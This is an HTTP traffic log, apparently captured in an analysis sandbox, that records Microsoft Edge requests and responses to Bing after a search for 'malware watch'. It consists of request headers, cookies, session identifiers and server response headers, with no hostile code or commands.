cookie: ak_bmsc=36919174BCEB2C1969D3ADC2940FB93D~000000000000000000000000000000~YAAQMjZ6XBxEd5OUAQAAfs89uRoTbVP56O6YAnbh6429jnaFf2b2t5pk5DDjonSc/sY2rwzMCZYb83oWj2T55anMb2Ng0NJVU5HS0Dsh80ohCJnD7tBBSh1r4WJjKkms/rsti6QCaZ8nRKLtH3KZkQK+8IX9ish50O12G9/SnCOyev4cxjNdmjO0RPxBzCWJbxgz93wcjM1zeTWBCKRFjUeRpwnHPR8E5AiW6cP52GNFLH9pjXGVaWF7UiXcUJL1EEUzNiMDPXBBitILp65+4Xq6SjeV5sLVxsFxGHuseCvjpEXQN8aQDrhJuUGNGU/SqO5OGbBHiXcBFvXnIzsGxsCIThG96ArxmTXqDrmIaFeN0/4F9YB9naqiqe80JRNfVAfUN6Su8p+i
cookie: MUID=2B1BFC6B1DFE63020FDCE9EF1C62624D
cookie: _EDGE_S=F=1&SID=05DFC6CDCE37668C2381D349CFAB67A5
cookie: _EDGE_V=1
cookie: _SS=PC=U531&SID=05DFC6CDCE37668C2381D349CFAB67A5
cookie: SRCHD=AF=ANAB01
cookie: SRCHUID=V=2&GUID=B572832A81B54D2484A18E26A0E9EAD7&dmnchg=1
cookie: USRLOC=HS=1&ELOC=LAT=51.519901275634766|LON=-0.10880059748888016|N=London%2C%20Greater%20London|ELT=1|
cookie: SRCHHPGUSR=SRCHLANG=en&DM=0&BRW=M&BRH=S&CW=1280&CH=609&SCW=1263&SCH=2918&DPR=1.0&UTC=0&PV=10.0
cookie: SRCHUSR=DOB=20250130&T=1738274627000
ResponseHTTP/2.0 200
etag: 0x8DCDC642C51AEC8
content-length: 4934
content-type: image/jpeg
content-md5: /aLOrgZ5YRk35ucfcBo2qw==
server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
x-ms-request-id: eb80deab-601e-0023-48af-16855b000000
x-ms-version: 2009-09-19
x-ms-lease-status: unlocked
x-ms-blob-type: BlockBlob
access-control-allow-origin: *
cache-control: public, no-transform, max-age=84869
expires: Fri, 31 Jan 2025 21:38:17 GMT
date: Thu, 30 Jan 2025 22:03:48 GMT
alt-svc: h3=":443"; ma=93600
akamai-grn: 0.32367a5c.1738274628.1ad0f7e8
timing-allow-origin: *
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingaotak"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
-
Remote address:88.221.135.16:443RequestGET /rp/c4ruj6QGsmSnOG64gJJnnnYDa44.br.css HTTP/2.0
host: r.bing.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
accept: text/css,*/*;q=0.1
sec-fetch-site: same-site
sec-fetch-mode: no-cors
sec-fetch-dest: style
referer: https://www.bing.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: ak_bmsc=36919174BCEB2C1969D3ADC2940FB93D~000000000000000000000000000000~YAAQMjZ6XBxEd5OUAQAAfs89uRoTbVP56O6YAnbh6429jnaFf2b2t5pk5DDjonSc/sY2rwzMCZYb83oWj2T55anMb2Ng0NJVU5HS0Dsh80ohCJnD7tBBSh1r4WJjKkms/rsti6QCaZ8nRKLtH3KZkQK+8IX9ish50O12G9/SnCOyev4cxjNdmjO0RPxBzCWJbxgz93wcjM1zeTWBCKRFjUeRpwnHPR8E5AiW6cP52GNFLH9pjXGVaWF7UiXcUJL1EEUzNiMDPXBBitILp65+4Xq6SjeV5sLVxsFxGHuseCvjpEXQN8aQDrhJuUGNGU/SqO5OGbBHiXcBFvXnIzsGxsCIThG96ArxmTXqDrmIaFeN0/4F9YB9naqiqe80JRNfVAfUN6Su8p+i
cookie: MUID=2B1BFC6B1DFE63020FDCE9EF1C62624D
cookie: _EDGE_S=F=1&SID=05DFC6CDCE37668C2381D349CFAB67A5
cookie: _EDGE_V=1
cookie: _SS=PC=U531&SID=05DFC6CDCE37668C2381D349CFAB67A5
cookie: SRCHD=AF=ANAB01
cookie: SRCHUID=V=2&GUID=B572832A81B54D2484A18E26A0E9EAD7&dmnchg=1
cookie: USRLOC=HS=1&ELOC=LAT=51.519901275634766|LON=-0.10880059748888016|N=London%2C%20Greater%20London|ELT=1|
cookie: SRCHHPGUSR=SRCHLANG=en&DM=0&BRW=M&BRH=S&CW=1280&CH=609&SCW=1263&SCH=2918&DPR=1.0&UTC=0&PV=10.0
cookie: SRCHUSR=DOB=20250130&T=1738274627000
cookie: _C_ETH=1
ResponseHTTP/2.0 200
content-type: text/html; charset=utf-8
cache-control: no-cache
content-encoding: br
expires: -1
pragma: no-cache
vary: Accept-Encoding
x-eventid: 679bf744639c45528586daf679aeaad7
accept-ch: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Full-Version, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, ECT, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UA
useragentreductionoptout: A7kgTC5xdZ2WIVGZEfb1hUoNuvjzOZX3VIV/BA6C18kQOOF50Q0D3oWoAm49k3BQImkujKILc7JmPysWk3CSjwUAAACMeyJvcmlnaW4iOiJodHRwczovL3d3dy5iaW5nLmNvbTo0NDMiLCJmZWF0dXJlIjoiU2VuZEZ1bGxVc2VyQWdlbnRBZnRlclJlZHVjdGlvbiIsImV4cGlyeSI6MTY4NDg4NjM5OSwiaXNTdWJkb21haW4iOnRydWUsImlzVGhpcmRQYXJ0eSI6dHJ1ZX0=
content-security-policy: script-src https: 'strict-dynamic' 'report-sample' 'wasm-unsafe-eval' 'nonce-/8bt6Qjiy+Qo1QMRC1g2OkTag492BapttJHZzOp1NVY='; base-uri 'self';report-to csp-endpoint
report-to: {"group":"csp-endpoint","max_age":86400,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingcsp"}]}
p3p: CP="NON UNI COM NAV STA LOC CURa DEVa PSAa PSDa OUR IND"
x-ceto-ref: 679bf744639c45528586daf679aeaad7|AFD:679bf744639c45528586daf679aeaad7|2025-01-30T22:03:48.616Z
date: Thu, 30 Jan 2025 22:03:48 GMT
set-cookie: _C_ETH=1; domain=.bing.com; path=/; secure; httponly
set-cookie: _C_Auth=
set-cookie: _RwBf=r=0&ilt=1&ihpd=0&ispd=1&rc=3&rb=0&gb=0&rg=200&pc=0&mtu=0&rbb=0&g=0&cid=&clo=0&v=1&l=2025-01-30T08:00:00.0000000Z&lft=0001-01-01T00:00:00.0000000&aof=0&ard=0001-01-01T00:00:00.0000000&rwdbt=0&rwflt=0&rwaul2=0&o=2&p=&c=&t=0&s=0001-01-01T00:00:00.0000000+00:00&ts=2025-01-30T22:03:48.6311742+00:00&rwred=0&wls=&wlb=&wle=&ccp=&cpt=&lka=0&lkt=0&aad=0&TH=; domain=.bing.com; expires=Fri, 30-Jan-2026 22:03:48 GMT; path=/; secure; SameSite=None
set-cookie: _Rwho=u=d&ts=2025-01-30; domain=.bing.com; path=/; secure; HttpOnly; SameSite=None
set-cookie: _SS=PC=U531&SID=05DFC6CDCE37668C2381D349CFAB67A5&R=3&RB=0&GB=0&RG=200&RP=0; domain=.bing.com; path=/; secure; SameSite=None
alt-svc: h3=":443"; ma=93600
x-cdn-traceid: 0.32367a5c.1738274628.1ad0f769
-
Remote address:88.221.135.16:443RequestGET /rp/5-y8FBmAkXLBZZghI-X94CRnsqg.br.css HTTP/2.0
host: r.bing.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
accept: text/css,*/*;q=0.1
sec-fetch-site: same-site
sec-fetch-mode: no-cors
sec-fetch-dest: style
referer: https://www.bing.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: ak_bmsc=36919174BCEB2C1969D3ADC2940FB93D~000000000000000000000000000000~YAAQMjZ6XBxEd5OUAQAAfs89uRoTbVP56O6YAnbh6429jnaFf2b2t5pk5DDjonSc/sY2rwzMCZYb83oWj2T55anMb2Ng0NJVU5HS0Dsh80ohCJnD7tBBSh1r4WJjKkms/rsti6QCaZ8nRKLtH3KZkQK+8IX9ish50O12G9/SnCOyev4cxjNdmjO0RPxBzCWJbxgz93wcjM1zeTWBCKRFjUeRpwnHPR8E5AiW6cP52GNFLH9pjXGVaWF7UiXcUJL1EEUzNiMDPXBBitILp65+4Xq6SjeV5sLVxsFxGHuseCvjpEXQN8aQDrhJuUGNGU/SqO5OGbBHiXcBFvXnIzsGxsCIThG96ArxmTXqDrmIaFeN0/4F9YB9naqiqe80JRNfVAfUN6Su8p+i
cookie: MUID=2B1BFC6B1DFE63020FDCE9EF1C62624D
cookie: _EDGE_S=F=1&SID=05DFC6CDCE37668C2381D349CFAB67A5
cookie: _EDGE_V=1
cookie: _SS=PC=U531&SID=05DFC6CDCE37668C2381D349CFAB67A5
cookie: SRCHD=AF=ANAB01
cookie: SRCHUID=V=2&GUID=B572832A81B54D2484A18E26A0E9EAD7&dmnchg=1
cookie: USRLOC=HS=1&ELOC=LAT=51.519901275634766|LON=-0.10880059748888016|N=London%2C%20Greater%20London|ELT=1|
cookie: SRCHHPGUSR=SRCHLANG=en&DM=0&BRW=M&BRH=S&CW=1280&CH=609&SCW=1263&SCH=2918&DPR=1.0&UTC=0&PV=10.0
cookie: SRCHUSR=DOB=20250130&T=1738274627000
cookie: _C_ETH=1
ResponseHTTP/2.0 200
p3p: CP="NON UNI COM NAV STA LOC CURa DEVa PSAa PSDa OUR IND"
access-control-allow-origin: *
x-eventid: 679bf744654b4c0e80f86405a1cb79a3
accept-ch: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Full-Version, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, ECT, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UA
useragentreductionoptout: A7kgTC5xdZ2WIVGZEfb1hUoNuvjzOZX3VIV/BA6C18kQOOF50Q0D3oWoAm49k3BQImkujKILc7JmPysWk3CSjwUAAACMeyJvcmlnaW4iOiJodHRwczovL3d3dy5iaW5nLmNvbTo0NDMiLCJmZWF0dXJlIjoiU2VuZEZ1bGxVc2VyQWdlbnRBZnRlclJlZHVjdGlvbiIsImV4cGlyeSI6MTY4NDg4NjM5OSwiaXNTdWJkb21haW4iOnRydWUsImlzVGhpcmRQYXJ0eSI6dHJ1ZX0=
content-security-policy: script-src https: 'strict-dynamic' 'report-sample' 'wasm-unsafe-eval' 'nonce-EFKy66YBh7aRJBcwiT7YAD79CZrOAt3LTqNgqqnK1xI='; base-uri 'self';report-to csp-endpoint
report-to: {"group":"csp-endpoint","max_age":86400,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingcsp"}]}
x-msedge-ref: Ref A: 6CE23C0438544CDEA120DFFDAA91410B Ref B: LON601060104025 Ref C: 2025-01-30T22:03:48Z
content-length: 0
date: Thu, 30 Jan 2025 22:03:48 GMT
set-cookie: MUIDB=2B1BFC6B1DFE63020FDCE9EF1C62624D; expires=Tue, 24-Feb-2026 22:03:48 GMT; path=/; HttpOnly
alt-svc: h3=":443"; ma=93600
x-cdn-traceid: 0.32367a5c.1738274628.1ad0f84d
-
Remote address:88.221.135.16:443RequestGET /rp/17Kbwo14aoBIPkSeISAgHKajyeA.br.css HTTP/2.0
host: r.bing.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
accept: text/css,*/*;q=0.1
sec-fetch-site: same-site
sec-fetch-mode: no-cors
sec-fetch-dest: style
referer: https://www.bing.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: ak_bmsc=36919174BCEB2C1969D3ADC2940FB93D~000000000000000000000000000000~YAAQMjZ6XBxEd5OUAQAAfs89uRoTbVP56O6YAnbh6429jnaFf2b2t5pk5DDjonSc/sY2rwzMCZYb83oWj2T55anMb2Ng0NJVU5HS0Dsh80ohCJnD7tBBSh1r4WJjKkms/rsti6QCaZ8nRKLtH3KZkQK+8IX9ish50O12G9/SnCOyev4cxjNdmjO0RPxBzCWJbxgz93wcjM1zeTWBCKRFjUeRpwnHPR8E5AiW6cP52GNFLH9pjXGVaWF7UiXcUJL1EEUzNiMDPXBBitILp65+4Xq6SjeV5sLVxsFxGHuseCvjpEXQN8aQDrhJuUGNGU/SqO5OGbBHiXcBFvXnIzsGxsCIThG96ArxmTXqDrmIaFeN0/4F9YB9naqiqe80JRNfVAfUN6Su8p+i
cookie: MUID=2B1BFC6B1DFE63020FDCE9EF1C62624D
cookie: _EDGE_S=F=1&SID=05DFC6CDCE37668C2381D349CFAB67A5
cookie: _EDGE_V=1
cookie: _SS=PC=U531&SID=05DFC6CDCE37668C2381D349CFAB67A5
cookie: SRCHD=AF=ANAB01
cookie: SRCHUID=V=2&GUID=B572832A81B54D2484A18E26A0E9EAD7&dmnchg=1
cookie: USRLOC=HS=1&ELOC=LAT=51.519901275634766|LON=-0.10880059748888016|N=London%2C%20Greater%20London|ELT=1|
cookie: SRCHHPGUSR=SRCHLANG=en&DM=0&BRW=M&BRH=S&CW=1280&CH=609&SCW=1263&SCH=2918&DPR=1.0&UTC=0&PV=10.0
cookie: SRCHUSR=DOB=20250130&T=1738274627000
cookie: _C_ETH=1
ResponseHTTP/2.0 200
pragma: no-cache
content-length: 1147
content-type: text/html; charset=UTF-8
content-encoding: gzip
expires: Fri, 01 Jan 1990 00:00:00 GMT
vary: Accept-Encoding
access-control-allow-origin: *
accept-ch: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
x-msedge-ref: Ref A: 40466515E8A44358A60A29B4E88BF474 Ref B: LON601060104025 Ref C: 2025-01-30T22:03:48Z
date: Thu, 30 Jan 2025 22:03:48 GMT
set-cookie: MSPTC=ko7PnoCIDPpX2kVIxaiMwxfKlT2MPTjz_xZWo3-pdLs; domain=.bing.com; expires=Tue, 24-Feb-2026 22:03:48 GMT; path=/; Partitioned; secure; SameSite=None
alt-svc: h3=":443"; ma=93600
x-cdn-traceid: 0.32367a5c.1738274628.1ad0f920
-
Remote address:88.221.135.16:443RequestGET /rp/vDjLjnEkXEuH2C8u3tT0A004qwQ.br.css HTTP/2.0
host: r.bing.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
accept: text/css,*/*;q=0.1
sec-fetch-site: same-site
sec-fetch-mode: no-cors
sec-fetch-dest: style
referer: https://www.bing.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: ak_bmsc=36919174BCEB2C1969D3ADC2940FB93D~000000000000000000000000000000~YAAQMjZ6XBxEd5OUAQAAfs89uRoTbVP56O6YAnbh6429jnaFf2b2t5pk5DDjonSc/sY2rwzMCZYb83oWj2T55anMb2Ng0NJVU5HS0Dsh80ohCJnD7tBBSh1r4WJjKkms/rsti6QCaZ8nRKLtH3KZkQK+8IX9ish50O12G9/SnCOyev4cxjNdmjO0RPxBzCWJbxgz93wcjM1zeTWBCKRFjUeRpwnHPR8E5AiW6cP52GNFLH9pjXGVaWF7UiXcUJL1EEUzNiMDPXBBitILp65+4Xq6SjeV5sLVxsFxGHuseCvjpEXQN8aQDrhJuUGNGU/SqO5OGbBHiXcBFvXnIzsGxsCIThG96ArxmTXqDrmIaFeN0/4F9YB9naqiqe80JRNfVAfUN6Su8p+i
cookie: MUID=2B1BFC6B1DFE63020FDCE9EF1C62624D
cookie: _EDGE_S=F=1&SID=05DFC6CDCE37668C2381D349CFAB67A5
cookie: _EDGE_V=1
cookie: _SS=PC=U531&SID=05DFC6CDCE37668C2381D349CFAB67A5
cookie: SRCHD=AF=ANAB01
cookie: SRCHUID=V=2&GUID=B572832A81B54D2484A18E26A0E9EAD7&dmnchg=1
cookie: USRLOC=HS=1&ELOC=LAT=51.519901275634766|LON=-0.10880059748888016|N=London%2C%20Greater%20London|ELT=1|
cookie: SRCHHPGUSR=SRCHLANG=en&DM=0&BRW=M&BRH=S&CW=1280&CH=609&SCW=1263&SCH=2918&DPR=1.0&UTC=0&PV=10.0
cookie: SRCHUSR=DOB=20250130&T=1738274627000
cookie: _C_ETH=1
ResponseHTTP/2.0 200
access-control-allow-origin: *
date: Thu, 30 Jan 2025 22:03:48 GMT
alt-svc: h3=":443"; ma=93600
x-cdn-traceid: 0.32367a5c.1738274628.1ad0fa61
-
POSThttps://www.bing.com/fd/ls/GLinkPingPost.aspx?IG=69579D85EA2D4E95B5358DAB8D3A2EA2&ID=SERP,5204.2&url=https%3A%2F%2Fwww.bing.com%2Fck%2Fa%3F!%26%26p%3D07539e014cb75e508897e36ea39bb08b84ed3b4c61ded522a00aab4da4cb1502JmltdHM9MTczODE5NTIwMA%26ptn%3D3%26ver%3D2%26hsh%3D4%26fclid%3D2b1bfc6b-1dfe-6302-0fdc-e9ef1c62624d%26psq%3Dmalware%2Bwatch%26u%3Da1aHR0cHM6Ly93d3cubWFsd2FyZXdhdGNoLm9yZy8%26ntb%3D1msedge.exeRemote address:88.221.135.16:443RequestPOST /fd/ls/GLinkPingPost.aspx?IG=69579D85EA2D4E95B5358DAB8D3A2EA2&ID=SERP,5204.2&url=https%3A%2F%2Fwww.bing.com%2Fck%2Fa%3F!%26%26p%3D07539e014cb75e508897e36ea39bb08b84ed3b4c61ded522a00aab4da4cb1502JmltdHM9MTczODE5NTIwMA%26ptn%3D3%26ver%3D2%26hsh%3D4%26fclid%3D2b1bfc6b-1dfe-6302-0fdc-e9ef1c62624d%26psq%3Dmalware%2Bwatch%26u%3Da1aHR0cHM6Ly93d3cubWFsd2FyZXdhdGNoLm9yZy8%26ntb%3D1 HTTP/2.0
host: www.bing.com
content-length: 0
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
sec-ch-ua-arch: "x86"
sec-ch-ua-full-version: "92.0.902.67"
sec-ch-ua-platform-version: "10.0"
content-type: text/plain;charset=UTF-8
ect: 4g
sec-ch-ua-model:
sec-ch-ua-platform: "Windows"
accept: */*
origin: https://www.bing.com
sec-fetch-site: same-origin
sec-fetch-mode: no-cors
sec-fetch-dest: empty
referer: https://www.bing.com/search?q=malware+watch&cvid=0e73f29b17ee4b719f03106da34802ca&aqs=edge..69i57j0l6.1385j0j4&FORM=ANAB01&PC=U531
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: ak_bmsc=36919174BCEB2C1969D3ADC2940FB93D~000000000000000000000000000000~YAAQMjZ6XBxEd5OUAQAAfs89uRoTbVP56O6YAnbh6429jnaFf2b2t5pk5DDjonSc/sY2rwzMCZYb83oWj2T55anMb2Ng0NJVU5HS0Dsh80ohCJnD7tBBSh1r4WJjKkms/rsti6QCaZ8nRKLtH3KZkQK+8IX9ish50O12G9/SnCOyev4cxjNdmjO0RPxBzCWJbxgz93wcjM1zeTWBCKRFjUeRpwnHPR8E5AiW6cP52GNFLH9pjXGVaWF7UiXcUJL1EEUzNiMDPXBBitILp65+4Xq6SjeV5sLVxsFxGHuseCvjpEXQN8aQDrhJuUGNGU/SqO5OGbBHiXcBFvXnIzsGxsCIThG96ArxmTXqDrmIaFeN0/4F9YB9naqiqe80JRNfVAfUN6Su8p+i
cookie: MUID=2B1BFC6B1DFE63020FDCE9EF1C62624D
cookie: _EDGE_S=F=1&SID=05DFC6CDCE37668C2381D349CFAB67A5
cookie: _EDGE_V=1
cookie: _SS=PC=U531&SID=05DFC6CDCE37668C2381D349CFAB67A5
cookie: MUIDB=2B1BFC6B1DFE63020FDCE9EF1C62624D
cookie: SRCHD=AF=ANAB01
cookie: SRCHUID=V=2&GUID=B572832A81B54D2484A18E26A0E9EAD7&dmnchg=1
cookie: USRLOC=HS=1&ELOC=LAT=51.519901275634766|LON=-0.10880059748888016|N=London%2C%20Greater%20London|ELT=1|
cookie: SRCHHPGUSR=SRCHLANG=en&DM=0&BRW=M&BRH=S&CW=1280&CH=609&SCW=1263&SCH=2918&DPR=1.0&UTC=0&PV=10.0
cookie: SRCHUSR=DOB=20250130&T=1738274627000
cookie: _C_ETH=1
ResponseHTTP/2.0 200
access-control-allow-origin: *
date: Thu, 30 Jan 2025 22:03:48 GMT
alt-svc: h3=":443"; ma=93600
x-cdn-traceid: 0.32367a5c.1738274628.1ad0fa70
-
GEThttps://www.bing.com/ck/a?!&&p=07539e014cb75e508897e36ea39bb08b84ed3b4c61ded522a00aab4da4cb1502JmltdHM9MTczODE5NTIwMA&ptn=3&ver=2&hsh=4&fclid=2b1bfc6b-1dfe-6302-0fdc-e9ef1c62624d&psq=malware+watch&u=a1aHR0cHM6Ly93d3cubWFsd2FyZXdhdGNoLm9yZy8&ntb=1msedge.exeRemote address:88.221.135.16:443RequestGET /ck/a?!&&p=07539e014cb75e508897e36ea39bb08b84ed3b4c61ded522a00aab4da4cb1502JmltdHM9MTczODE5NTIwMA&ptn=3&ver=2&hsh=4&fclid=2b1bfc6b-1dfe-6302-0fdc-e9ef1c62624d&psq=malware+watch&u=a1aHR0cHM6Ly93d3cubWFsd2FyZXdhdGNoLm9yZy8&ntb=1 HTTP/2.0
host: www.bing.com
ect: 4g
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
sec-ch-ua-mobile: ?0
sec-ch-ua-full-version: "92.0.902.67"
sec-ch-ua-arch: "x86"
sec-ch-ua-platform: "Windows"
sec-ch-ua-platform-version: "10.0"
sec-ch-ua-model: ""
dnt: 1
upgrade-insecure-requests: 1
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
sec-fetch-site: same-origin
sec-fetch-mode: navigate
sec-fetch-user: ?1
sec-fetch-dest: document
referer: https://www.bing.com/search?q=malware+watch&cvid=0e73f29b17ee4b719f03106da34802ca&aqs=edge..69i57j0l6.1385j0j4&FORM=ANAB01&PC=U531
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: ak_bmsc=36919174BCEB2C1969D3ADC2940FB93D~000000000000000000000000000000~YAAQMjZ6XBxEd5OUAQAAfs89uRoTbVP56O6YAnbh6429jnaFf2b2t5pk5DDjonSc/sY2rwzMCZYb83oWj2T55anMb2Ng0NJVU5HS0Dsh80ohCJnD7tBBSh1r4WJjKkms/rsti6QCaZ8nRKLtH3KZkQK+8IX9ish50O12G9/SnCOyev4cxjNdmjO0RPxBzCWJbxgz93wcjM1zeTWBCKRFjUeRpwnHPR8E5AiW6cP52GNFLH9pjXGVaWF7UiXcUJL1EEUzNiMDPXBBitILp65+4Xq6SjeV5sLVxsFxGHuseCvjpEXQN8aQDrhJuUGNGU/SqO5OGbBHiXcBFvXnIzsGxsCIThG96ArxmTXqDrmIaFeN0/4F9YB9naqiqe80JRNfVAfUN6Su8p+i
cookie: MUID=2B1BFC6B1DFE63020FDCE9EF1C62624D
cookie: _EDGE_S=F=1&SID=05DFC6CDCE37668C2381D349CFAB67A5
cookie: _EDGE_V=1
cookie: MUIDB=2B1BFC6B1DFE63020FDCE9EF1C62624D
cookie: SRCHD=AF=ANAB01
cookie: SRCHUID=V=2&GUID=B572832A81B54D2484A18E26A0E9EAD7&dmnchg=1
cookie: USRLOC=HS=1&ELOC=LAT=51.519901275634766|LON=-0.10880059748888016|N=London%2C%20Greater%20London|ELT=1|
cookie: SRCHUSR=DOB=20250130&T=1738274627000
cookie: _C_ETH=1
cookie: _RwBf=r=0&ilt=1&ihpd=0&ispd=1&rc=3&rb=0&gb=0&rg=200&pc=0&mtu=0&rbb=0&g=0&cid=&clo=0&v=1&l=2025-01-30T08:00:00.0000000Z&lft=0001-01-01T00:00:00.0000000&aof=0&ard=0001-01-01T00:00:00.0000000&rwdbt=0&rwflt=0&rwaul2=0&o=2&p=&c=&t=0&s=0001-01-01T00:00:00.0000000+00:00&ts=2025-01-30T22:03:48.6311742+00:00&rwred=0&wls=&wlb=&wle=&ccp=&cpt=&lka=0&lkt=0&aad=0&TH=
cookie: _Rwho=u=d&ts=2025-01-30
cookie: _SS=PC=U531&SID=05DFC6CDCE37668C2381D349CFAB67A5&R=3&RB=0&GB=0&RG=200&RP=0
cookie: SRCHHPGUSR=SRCHLANG=en&DM=0&BRW=M&BRH=S&CW=1280&CH=609&SCW=1263&SCH=2918&DPR=1.0&UTC=0&PV=10.0&EXLTT=1
ResponseHTTP/2.0 200
content-length: 1
content-type: text/html
content-encoding: br
vary: Accept-Encoding
p3p: CP="NON UNI COM NAV STA LOC CURa DEVa PSAa PSDa OUR IND"
x-eventid: 679bf745e0f8496d9f85877b88bc6f29
accept-ch: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Full-Version, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, ECT, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UA
useragentreductionoptout: A7kgTC5xdZ2WIVGZEfb1hUoNuvjzOZX3VIV/BA6C18kQOOF50Q0D3oWoAm49k3BQImkujKILc7JmPysWk3CSjwUAAACMeyJvcmlnaW4iOiJodHRwczovL3d3dy5iaW5nLmNvbTo0NDMiLCJmZWF0dXJlIjoiU2VuZEZ1bGxVc2VyQWdlbnRBZnRlclJlZHVjdGlvbiIsImV4cGlyeSI6MTY4NDg4NjM5OSwiaXNTdWJkb21haW4iOnRydWUsImlzVGhpcmRQYXJ0eSI6dHJ1ZX0=
content-security-policy: script-src https: 'strict-dynamic' 'report-sample' 'wasm-unsafe-eval' 'nonce-tGP4i4suwMiV0jKFGKQQywI2nx++Y8Ij7o/1JdvSTos='; base-uri 'self';report-to csp-endpoint
report-to: {"group":"csp-endpoint","max_age":86400,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingcsp"}]}
x-msedge-ref: Ref A: 2D814703087C461DA5398CEDB526B408 Ref B: LON601060101060 Ref C: 2025-01-30T22:03:49Z
date: Thu, 30 Jan 2025 22:03:49 GMT
set-cookie: MUIDB=2B1BFC6B1DFE63020FDCE9EF1C62624D; expires=Tue, 24-Feb-2026 22:03:49 GMT; path=/; HttpOnly
set-cookie: _EDGE_S=SID=14D40D1B5E5460232562189F5F6561DB; domain=.bing.com; path=/; HttpOnly
alt-svc: h3=":443"; ma=93600
x-cdn-traceid: 0.32367a5c.1738274629.1ad0fb18
-
GEThttps://www.bing.com/fd/ls/l?BF=MSJ1&IG=69579D85EA2D4E95B5358DAB8D3A2EA2&TYPE=Event.ClientInst&DATA=[{%22T%22:%22CI.BF%22,%22X%22:1}]msedge.exeRemote address:88.221.135.16:443RequestGET /fd/ls/l?BF=MSJ1&IG=69579D85EA2D4E95B5358DAB8D3A2EA2&TYPE=Event.ClientInst&DATA=[{%22T%22:%22CI.BF%22,%22X%22:1}] HTTP/2.0
host: www.bing.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
sec-ch-ua-arch: "x86"
sec-ch-ua-full-version: "92.0.902.67"
sec-ch-ua-platform-version: "10.0"
ect: 4g
sec-ch-ua-model:
sec-ch-ua-platform: "Windows"
accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
sec-fetch-site: same-origin
sec-fetch-mode: no-cors
sec-fetch-dest: image
referer: https://www.bing.com/search?q=malware+watch&cvid=0e73f29b17ee4b719f03106da34802ca&aqs=edge..69i57j0l6.1385j0j4&FORM=ANAB01&PC=U531
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
